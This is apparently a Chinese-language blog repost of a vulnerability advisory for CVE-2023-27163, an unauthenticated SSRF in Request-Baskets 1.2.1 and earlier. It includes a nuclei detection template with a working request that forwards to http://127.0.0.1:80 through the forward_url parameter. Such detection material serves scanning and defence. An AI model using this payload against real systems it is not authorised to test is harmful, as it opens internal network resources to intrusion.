Request-Baskets SSRF via forward_url Vulnerability

漏洞信息

漏洞名称: Request-Baskets SSRF via forward_url Vulnerability

漏洞编号:

  • CVE: CVE-2023-27163

漏洞类型: 服务端请求伪造

漏洞等级: 中危

漏洞描述: Request-Baskets是一个用Golang编写的轻量级HTTP代理服务,主要用于收集、管理和转发HTTP请求。它通常被部署在开发和测试环境中,用于模拟API响应或收集请求数据。由于其简单易用的特性,Request-Baskets在开发社区中有一定的使用率。该服务在版本1.2.1及之前存在一个服务器端请求伪造(SSRF)漏洞,攻击者可以通过未认证的POST请求,利用forward_url参数将请求转发到任意内部网络地址,从而访问或攻击内网资源。漏洞的根源在于服务在处理创建新篮子(basket)的请求时,未能充分验证forward_url参数的合法性,导致攻击者可以构造恶意的URL,绕过安全限制。这种漏洞可能导致内网服务的信息泄露、服务拒绝攻击,甚至进一步的内网渗透。由于攻击无需认证,且可以自动化执行,因此对使用受影响版本的用户构成了较高的安全风险。

产品厂商: darklynx

产品名称: Request-Baskets

影响版本: <= 1.2.1

来源: https://github.com/projectdiscovery/nuclei-templates/blob/5ac1ca35447875750400a6c5184d7f464f15b54c/http%2Fcves%2F2023%2FCVE-2023-27163.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44

id: CVE-2023-27163

info:
name: Request-Baskets <= 1.2.1 - SSRF via forward_url
author: Jaenact
severity: medium
description: |
Request-Baskets <= 1.2.1 allows unauthenticated SSRF via the forward_url
parameter when creating a new basket.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-27163
- https://github.com/darklynx/request-baskets
- https://hub.docker.com/r/darklynx/request-baskets
- https://infosecwriteups.com/exploit-analysis-request-baskets-v1-2-1-server-side-request-forgery-ssrf-688fffd1f424
tags: cve,ssrf,request-baskets,unauthenticated,http,proxy,golang

http:
- method: POST
path:
- "{{BaseURL}}/api/baskets/{{randstr}}"

headers:
Content-Type: application/json

body: |
{
"forward_url": "http://127.0.0.1:80",
"proxy_response": true,
"insecure_tls": false,
"expand_path": true,
"capacity": 250
}

matchers:
- type: status
status:
- 201

- type: word
part: body
words:
- "token"


Request-Baskets SSRF via forward_url Vulnerability
http://example.com/2025/07/31/github_1452091534/
作者
lianccc
发布于
2025年7月31日
许可协议